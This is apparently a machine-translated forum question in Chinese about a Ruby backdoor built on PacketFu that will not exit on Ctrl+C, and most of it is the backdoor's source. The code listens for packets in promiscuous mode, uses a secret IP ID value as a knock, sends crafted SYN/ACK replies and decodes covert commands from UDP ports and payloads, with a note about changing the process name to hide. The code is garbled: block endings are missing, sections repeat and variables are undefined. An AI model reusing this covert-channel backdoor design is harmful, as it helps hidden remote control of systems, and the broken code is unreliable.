我正在编写一个使用 PacketFu 侦听数据包的 ruby 后门程序。
应用程序正常工作,但由于某种原因它不会在中断时退出 (ctrl+c)
编辑:我可以在执行 packet.stream.each 循环时正确捕获中断(强制一些 TCP 流量)。似乎 PacketFu 在等待新数据包时所做的一切都使其免受中断的影响。我想我现在会忽略它,如果有人知道 PacketFu 代码可能会导致这种情况,我很想知道!
# Start listening for connection packets via TCP
print "starting up\n"
capturedTCP = PacketFu::Capture.new(:iface => $config[:iface], :start => true, :promisc => true, :filter => "tcp")
print "about to capture\n"
capturedTCP.stream.each { |packet|
puts "Got one!"
pkt = Packet.parse packet
# Check that it is a TCP packet?
if pkt.is_tcp?
# Is it one of our SYN packets?
if pkt.tcp_flags.syn == 1 && pkt.ip_id == $identKey
# TODO: Respond with SYN/ACK
flags = [1,0,0,0,1,0]
payload = ""
tcpResp = tcpConstruct($identKey,srcIP,80,dstIP,Random.rand(65535),flags, payload)
tcpResp.to_w # Sent
# TODO: Use thread instead.
rescue Interrupt => e
puts "Interrupted by user"
exit 0
require 'rubygems'
require 'packetfu'
require 'thread'
include PacketFu
#TODO: Move these functions to a diff file
# Utility function for loading latest config
def loadConfig(filePath)
#TODO: Load up file and get config
#For now just hard coded.
$iName = "eth0"
identKey = 12345
listenPortMain = "80" # Port to listen for connection requests
processName = "xyz" # Change process name to hide.
filterTCP = "tcp and port #{listenPortMain}"
userCmdField = "src-port" # Options: src-port, dst-port
userCmdRun = "20"
# Function for handling client session
def clientListen(ip,port)
# Start listening for connection packets via UDP
capturedUDP = PacketFu::Capture.new(:iface => config[:iface], :start => true, :promisc => true, :filter => "udp and port #{port} and src host #{ip}")
capturedUDP.stream.each { |packet|
pkt = Packet.parse packet
# Check that it is a UDP packet
if pkt.is_udp?
# Is it one of our UDP packets?
if pkt.ip_id == identKey
# Get the data
data = pkt.payload()
# Look for the command type
if userCmdField == "src-port"
cmdFieldVal = pkt.udp_src
if userCmdField == "dst-port"
cmdFieldVal = pkt.udp_dst
# Command processing
if userCmdField == userCmdRun
cmdDataChrs = [];
# Check for sequence number
seqCurrent = pkt.payload[0].unpack("H*")[0].to_i
seqTotal = pkt.payload[1].unpack("H*")[0].to_i
dataLen = (pkt.payload[2].unpack("H*").chr + pkt.payload[2].unpack("H*").chr).to_i
while pos <= dataLen do
pos = pos + 1
cmdData = cmdDataChrs.unpack("H*")
print "Got command: #{cmdData}"
#Construct TCP Packet
def tcpConstruct(identKey,srcIP,srcPort,dstIP,dstPort,flags, payload)
#--> Build TCP/IP
#- Build Ethernet header:---------------------------------------
pkt = PacketFu::TCPPacket.new(:config => $config , :flavor => "Linux")
# pkt.eth_src = "00:11:22:33:44:55" # Ether header: Source MAC ; you can use: pkt.eth_header.eth_src
# pkt.eth_dst = "FF:FF:FF:FF:FF:FF" # Ether header: Destination MAC ; you can use: pkt.eth_header.eth_dst
pkt.eth_proto # Ether header: Protocol ; you can use: pkt.eth_header.eth_proto
#- Build IP header:---------------------------------------
pkt.ip_v = 4 # IP header: IPv4 ; you can use: pkt.ip_header.ip_v
pkt.ip_hl = 5 # IP header: IP header length ; you can use: pkt.ip_header.ip_hl
pkt.ip_tos = 0 # IP header: Type of service ; you can use: pkt.ip_header.ip_tos
pkt.ip_len = 20 # IP header: Total Length ; you can use: pkt.ip_header.ip_len
pkt.ip_id = identKey # IP header: Identification ; you can use: pkt.ip_header.ip_id
pkt.ip_frag = 0 # IP header: Don't Fragment ; you can use: pkt.ip_header.ip_frag
pkt.ip_ttl = 115 # IP header: TTL(64) is the default ; you can use: pkt.ip_header.ip_ttl
pkt.ip_proto = 6 # IP header: Protocol = tcp (6) ; you can use: pkt.ip_header.ip_proto
pkt.ip_sum # IP header: Header Checksum ; you can use: pkt.ip_header.ip_sum
pkt.ip_saddr = srcIP # IP header: Source IP. use $config[:ip_saddr] if you want your real IP ; you can use: pkt.ip_header.ip_saddr
pkt.ip_daddr = dstIP # IP header: Destination IP ; you can use: pkt.ip_header.ip_daddr
#- TCP header:---------------------------------------
pkt.payload = payload # TCP header: packet header(body)
pkt.tcp_flags.ack = flags[0] # TCP header: Acknowledgment
pkt.tcp_flags.fin = flags[1] # TCP header: Finish
pkt.tcp_flags.psh = flags[2] # TCP header: Push
pkt.tcp_flags.rst = flags[3] # TCP header: Reset
pkt.tcp_flags.syn = flags[4] # TCP header: Synchronize sequence numbers
pkt.tcp_flags.urg = flags[5] # TCP header: Urgent pointer
pkt.tcp_ecn = 0 # TCP header: ECHO
pkt.tcp_win = 8192 # TCP header: Window
pkt.tcp_hlen = 5 # TCP header: header length
pkt.tcp_src = srcPort # TCP header: Source Port (random is the default )
pkt.tcp_dst = dstPort # TCP header: Destination Port (make it random/range for general scanning)
pkt.recalc # Recalculate/re-build whole pkt (should be at the end)
return pkt
def dataListener(identKey,dstIP,dstPort)
# Listen for UDP data packets
print "Listening for Data from #{dstIP}\n"
capturedUDP = PacketFu::Capture.new(:iface => $config[:iface], :start => true, :promisc => true, :filter => "udp and port #{dstPort}")
capturedTCP.stream.each { |packet|
pkt = Packet.parse packet
if pkt.ip_id == identKey
# Get Packet Type
if userCmdField == "src-port"
dataType = pkt.udp_src
elsif userCmdField == "dst-port"
dataType = pkt.udp_dst
if dataType == userCmdRun
cmdLen = pkt.payload[0].unpack("c*")
cmd = ""
while i <= cmdLen do
cmd += pkt.payload[i].unpack("h*")
print "Command: #{cmd}\n"
# - - - - Begin Main
# Get config from file
#$config = PacketFu::Config.new(PacketFu::Utils.whoami?(:iface=> iName)).config # set interface
$config = PacketFu::Config.new(:iface=> $iName).config # use this line instead of above if you face `whoami?': uninitialized constant PacketFu::Capture (NameError)
#TODO: Mask process name from config
# Create sessions array (Holds threads)
sessions = []
Signal.trap('INT') { exit 0 }
# Start listening for connection packets via TCP
print "starting up\n"
capturedTCP = PacketFu::Capture.new(:iface => $config[:iface], :start => true, :promisc => true, :filter => "tcp")
print "about to capture\n"
capturedTCP.stream.each { |packet|
puts "Got one!"
pkt = Packet.parse packet
# Check that it is a TCP packet?
if pkt.is_tcp?
# Is it one of our SYN packets?
if pkt.tcp_flags.syn == 1 && pkt.ip_id == $identKey
# TODO: Respond with SYN/ACK
flags = [1,0,0,0,1,0]
payload = ""
tcpResp = tcpConstruct($identKey,srcIP,80,dstIP,Random.rand(65535),flags, payload)
tcpResp.to_w # Sent
# TODO: Use thread instead.